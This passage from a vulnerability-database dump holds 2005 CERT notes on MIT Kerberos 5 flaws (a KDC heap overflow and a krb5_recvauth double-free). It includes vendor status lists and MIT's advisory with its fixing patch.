krb5-kdc package), \nklogind, and kshd (both from the krb5-rsh-server package). \n(CVE-2005-1689)\n\nPlease note that these packages are not officially supported by Ubuntu \n(they are in the 'universe' component of the archive).", "edition": 6, "modified": "2005-12-06T00:00:00", "published": "2005-12-06T00:00:00", "id": "USN-224-1", "href": "https://ubuntu.com/security/notices/USN-224-1", "title": "Kerberos vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:43:34", "bulletinFamily": "info", "cvelist": ["CVE-2005-1175"], "description": "### Overview \n\nUnauthenticated attacker can cause MIT krb5 Key Distribution Center (KDC) to overflow a heap buffer by one byte, possibly leading to arbitrary code execution.\n\n### Description \n\nKerberos is a network authentication system which uses a trusted third party (a KDC) to authenticate clients and servers to each other. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. MIT Kerberos code is used in network applications from a variety of different vendors and is included in many UNIX and Linux distributions.\n\nThe [MIT krb5 Security Advisory 2005-002](<http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-002-kdc.txt>) issued 2005 July 12, available from \n&lt;<http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-002-kdc.txt>&gt; indicates: \n \nWhen an MIT krb5 Key Distribution Center (KDC) implementation receives a certain unlikely (but valid) request via a TCP or UDP connection it can trigger a bug in the krb5 library which results in a single-byte overflow of a heap buffer. Application servers are vulnerable to a highly improbable attack, provided that the attacker controls a realm sharing a cross-realm key with the target realm. \n \n--- \n \n### Impact \n\nAn unauthenticated attacker may be able to use this vulnerability to execute arbitrary code on the KDC host, potentially compromising an entire Kerberos realm. No exploit code is known to exist at this time. According to the [MIT krb5 Security Advisory 2005-002](<http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-002-kdc.txt>) this vulnerability affects KDC implementations and application servers in all MIT krb5 releases, up to and including krb5-1.4.1. Third-party application servers which use MIT krb5 are also affected. \n \n--- \n \n### Solution \n\nApply patches available from your vendor. Details of the patch are also available from\n\n \n<http://web.mit.edu/kerberos/advisories/2005-002-patch_1.4.1.txt>. \n \n--- \n \n### Vendor Information\n\n885830\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Red Hat Inc. __ Affected\n\nNotified: May 10, 2005 Updated: July 11, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nRed Hat, Inc \n \nThis issue affects the Kerberos packages shipped with Red Hat Enterprise \nLinux. For Red Hat Enterprise Linux 2.1 and Red Hat Enterprise Linux 3 \nthis issue is critical severity. Please see our advisory for more \ninformation: \n \n<https://rhn.redhat.com/errata/RHSA-2005-562.html> \n \nRed Hat Enterprise Linux 4 contains checks within glibc that detect \ndouble-free flaws. Therefore on Red Hat Enterprise Linux 4 successful \nexploitation of this issue can only lead to a denial of service (KDC \ncrash) which is important severity. Please see our advisory for more \ninformation: \n \n<https://rhn.redhat.com/errata/RHSA-2005-567.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Sun Microsystems Inc. __ Affected\n\nNotified: May 10, 2005 Updated: July 13, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSun is affected by the two Kerberos vulnerabilities described in MIT Advisory MITKRB5-SA-2005-002 and CERT VU#259798 and VU#885830. Sun has published Sun Alert 101809 which is available here:\n\n \n<http://sunsolve.sun.com/search/document.do?assetkey=1-26-101809-1> \nfor these issues. \n \nThe Sun Alert is currently unresolved but will be updated once either IDRs or T-patches are available on SunSolve. The Sun Alert will ultimately be updated with the released patch information for the final resolution. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### F5 Networks __ Not Affected\n\nNotified: May 12, 2005 Updated: May 27, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nF5 products do not include a KDC. No F5 products are vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: May 10, 2005 Updated: June 21, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks' products do not employ Kerberos in any configuration. Juniper's products are not subject to exploitation via the vulnerability in the MIT krb5.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Microsoft Corporation __ Not Affected\n\nNotified: May 10, 2005 Updated: May 19, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nAt this point, we have determined that there are no Microsoft products affected by this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMicrosoft made the above statement on May 15, 2005.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Apple Computer Inc. __ Unknown\n\nNotified: May 10, 2005 Updated: May 10, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Conectiva __ Unknown\n\nNotified: May 10, 2005 Updated: May 10, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Cray Inc. __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Debian __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### EMC Corporation __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Engarde __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### FreeBSD __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Fujitsu __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### HP __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Hitachi __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### IBM __ Unknown\n\nNotified: May 10, 2005 Updated: May 10, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Immunix __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Ingrian Networks __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### KTH Kerberos __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### MandrakeSoft __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### MontaVista Software __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### NEC Corporation __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### NetBSD __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Nokia __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Novell __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Openwall GNU/*/Linux __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### QNX __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### SCO __ Unknown\n\nNotified: May 10, 2005 Updated: May 10, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### SGI __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Sony Corporation __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### SuSE Inc. __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### TurboLinux __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Unisys __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### WRQ __ Unknown\n\nNotified: May 10, 2005 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\n### Wind River Systems Inc. __ Unknown\n\nNotified: May 10, 2005 Updated: May 10, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23885830 Feedback>).\n\nView all 35 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-002-kdc.txt>\n * <http://web.mit.edu/kerberos/advisories/2005-002-patch_1.4.1.txt>\n\n### Acknowledgements\n\nThis vulnerability was reported by the MIT Kerberos Development Team. The MIT Kerberos Development Team thank Daniel Wachdorf for reporting this vulnerability.\n\nThis document was written by Robert Mead based on information in the MIT krb5 Security Advisory 2005-002.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-1175](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-1175>) \n---|--- \n**Severity Metric:** | 4.63 \n**Date Public:** | 2005-07-12 \n**Date First Published:** | 2005-07-13 \n**Date Last Updated: ** | 2005-07-13 15:15 UTC \n**Document Revision: ** | 26 \n", "modified": "2005-07-13T15:15:00", "published": "2005-07-13T00:00:00", "id": "VU:885830", "href": "https://www.kb.cert.org/vuls/id/885830", "type": "cert", "title": "MIT Kerberos 5 allows unauthenticated attacker to cause MIT krb5 Key Distribution Center to overflow a heap buffer by one byte", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T20:43:33", "bulletinFamily": "info", "cvelist": ["CVE-2005-1689"], "description": "### Overview \n\nAn unauthenticated attacker can cause krb5_recvauth() function to free a block of memory twice, possibly leading to arbitrary code execution.\n\n### Description \n\nKerberos is a network authentication system that uses a trusted third party (a KDC) to authenticate clients and servers to each other. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. MIT Kerberos code is used in network applications from a variety of different vendors and is included in many UNIX and Linux distributions.\n\n[MIT krb5 Security Advisory 2005-003](<http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-003-recvauth.txt>) issued 2005 July 12, available from \n&lt;<http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-003-recvauth.txt>&gt; states: \n \nThe krb5_recvauth() function can free previously freed memory under some error conditions. This vulnerability may allow an unauthenticated remote attacker to execute arbitrary code. Exploitation of this vulnerability on a Kerberos Key Distribution Center (KDC) host can result in compromise of an entire Kerberos realm. No exploit code is known to exist at this time. Exploitation of double-free vulnerabilities is believed to be difficult. \n \n--- \n \n### Impact \n\nAn unauthenticated attacker may be able to execute arbitrary code in the context of a program calling krb5_recvauth(). This includes the kpropd program which typically runs on slave Key Distribution Center (KDC) hosts, potentially leading to compromise of an entire Kerberos realm. For more information please see the [MIT krb5 Security Advisory 2005-003](<http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-003-recvauth.txt>). \n \n--- \n \n### Solution \n\nApply patches available from your vendor. Details of the patch are also available from\n\n \n<http://web.mit.edu/kerberos/advisories/2005-003-patch_1.4.1.txt>. \n \n--- \n \n### Vendor Information\n\n623332\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### MiT Kerberos Development Team __ Affected\n\nUpdated: July 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n \nMIT krb5 Security Advisory 2005-003 \n \nOriginal release: 2005-07-12 \n \nTopic: double-free in krb5_recvauth \n \nSeverity: CRITICAL \n \nSUMMARY \n======= \n \nThe krb5_recvauth() function can free previously freed memory under \nsome error conditions. This vulnerability may allow an \nunauthenticated remote attacker to execute arbitrary code. \nExploitation of this vulnerability on a Kerberos Key Distribution \nCenter (KDC) host can result in compromise of an entire Kerberos \nrealm. No exploit code is known to exist at this time. Exploitation \nof double-free vulnerabilities is believed to be difficult. \n[CAN-2005-1689, VU#623332] \n \nIMPACT \n====== \n \nAn unauthenticated attacker may be able to execute arbitrary code in \nthe context of a program calling krb5_recvauth(). This includes the \nkpropd program which typically runs on slave Key Distribution Center \n(KDC) hosts, potentially leading to compromise of an entire Kerberos \nrealm. Other vulnerable programs which call krb5_recvauth() are \nusually remote login programs running with root privileges. \nUnsuccessful attempts at exploitation may result in denial of service \nby crashing the target program. \n \nAFFECTED SOFTWARE \n================= \n \n* The kpropd daemon in all releases of MIT krb5, up to and including \nkrb5-1.4.1, is vulnerable. \n \n* The klogind and krshd remote-login daemons in all releases of MIT \nkrb5, up to and including krb5-1.4.1, is vulnerable. \n \n* Third-party application programs which call krb5-recvauth() are also \nvulnerable. \n \nFIXES \n===== \n \n* The upcoming krb5-1.4.2 release will have a fix for this \nvulnerability. \n \n* Apply the following patch. This patch was generated against the \nkrb5-1.4.1 release. It may apply, with some offset, to earlier \nreleases. \n \nThe patch may also be found at: \n \n<http://web.mit.edu/kerberos/advisories/2005-003-patch_1.4.1.txt> \n \nThe associated detached PGP signature is at: \n \n<http://web.mit.edu/kerberos/advisories/2005-003-patch_1.4.1.txt.asc> \n \nIndex: lib/krb5/krb/recvauth.c \n=================================================================== \nRCS file: /cvs/krbdev/krb5/src/lib/krb5/krb/recvauth.c,v \nretrieving revision 5.38 \ndiff -c -r5.38 recvauth.c \n*** lib/krb5/krb/recvauth.c 3 Sep 2002 01:13:47 -0000 5.38 \n- --- lib/krb5/krb/recvauth.c 23 May 2005 23:19:15 -0000 \n*************** \n*** 76,82 **** \nif ((retval = krb5_read_message(context, fd, &inbuf))) \nreturn(retval); \nif (strcmp(inbuf.data, sendauth_version)) { \n- - krb5_xfree(inbuf.data); \nproblem = KRB5_SENDAUTH_BADAUTHVERS; \n} \nkrb5_xfree(inbuf.data); \n- --- 76,81 ---- \n*************** \n*** 90,96 **** \nif ((retval = krb5_read_message(context, fd, &inbuf))) \nreturn(retval); \nif (appl_version && strcmp(inbuf.data, appl_version)) { \n- - krb5_xfree(inbuf.data); \nif (!problem) \nproblem = KRB5_SENDAUTH_BADAPPLVERS; \n} \n- --- 89,94 ---- \n \nREFERENCES \n========== \n \nThis announcement and related security advisories may be found on the \nMIT Kerberos security advisory page at: \n \n<http://web.mit.edu/kerberos/advisories/index.html> \n \nThe main MIT Kerberos web page is at: \n \n<http://web.mit.edu/kerberos/index.html> \n \nCVE: CAN-2005-1689 \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1689> \n \nCERT: VU#623332 \n<http://www.kb.cert.org/vuls/id/623332> \n \nACKNOWLEDGMENTS \n=============== \n \nThanks to Magnus Hagander for reporting this vulnerability. \n \nDETAILS \n======= \n \nThe helper function revcauth_common() in lib/krb5/krb/recvauth.c has \ntwo locations which call krb5_read_message(), followed by an \nunconditional krb5_xfree() of the buffer allocated by \nkrb5_read_message(). In the cases where the sendauth version string \nor the application version string do not match the expected value, \nrecvauth_common() performs a krb5_xfree() on the buffer allocated by \nkrb5_read_message() preceding the subsequent unconditional call to \nkrb5_xfree() on the same buffer. \n \nSince the code paths which call krb5_xfree() twice do so with almost \nno intervening code, exploitation of this vulnerability may be more \ndifficult than exploitation of other double-free vulnerabilities. No \ndetailed analysis has been performed on the ease of exploitation. \n \nREVISION HISTORY \n================ \n \n2005-05-12 original release \n \nCopyright (C) 2005 Massachusetts Institute of Technology \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.5 (SunOS) \n \niQCVAwUBQtMbD6bDgE/zdoE9AQGmhQP+MYnmuw4+J3yIcQbS3chjZXVLHebTJJtN \njM5+cMBDQfYdpuoQER1Bbaf+7Ky1BoyX2zHfANzdDAiSFRykbFqEqgvdw9jqEFmx \nela1UtOhV5H80BZAzmGV+dVIqGPpWH0f4ArRe18Pbz2wZE0Vadq9VkBTJwHI23En \nK3a9oiHA/XM= \n=ZS63 \n-----END PGP SIGNATURE----- \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Red Hat Inc. __ Affected\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nRed Hat, Inc \n \nThis issue affects the Kerberos packages shipped with Red Hat Enterprise \nLinux. For Red Hat Enterprise Linux 2.1 and Red Hat Enterprise Linux 3 \nthis issue is critical severity. Please see our advisory for more \ninformation: \n \n<https://rhn.redhat.com/errata/RHSA-2005-562.html> \n \nRed Hat Enterprise Linux 4 contains checks within glibc that detect \ndouble-free flaws. Therefore on Red Hat Enterprise Linux 4 successful \nexploitation of this issue can only lead to a denial of service (KDC \ncrash) which is important severity. Please see our advisory for more \ninformation: \n \n<https://rhn.redhat.com/errata/RHSA-2005-567.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Sun Microsystems Inc. __ Affected\n\nNotified: June 06, 2005 Updated: July 13, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSun is affected by the Kerberos vulnerability described in MIT Advisory MITKRB5-SA-2005-003 and CERT VU#623332. Sun has published Sun Alert 101810 which is available here:\n\n \n<http://sunsolve.sun.com/search/document.do?assetkey=1-26-101810-1> \nfor this issue. \n \nThe Sun Alert is currently unresolved but will be updated once either IDRs or T-patches are available on SunSolve. The Sun Alert will ultimately be updated with the released patch information for the final resolution. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Check Point __ Not Affected\n\nNotified: June 06, 2005 Updated: June 09, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCheck Point products are not vulnerable to this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### F5 Networks __ Not Affected\n\nNotified: June 06, 2005 Updated: June 06, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nF5 products do not include a KDC. No F5 products are vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Force10 Networks Inc. __ Not Affected\n\nNotified: June 06, 2005 Updated: June 07, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nForce10 does not implement Kerberos in its products, so we do not need to be listed as a vendor in the vulnerability note.\n\n### Vendor Information 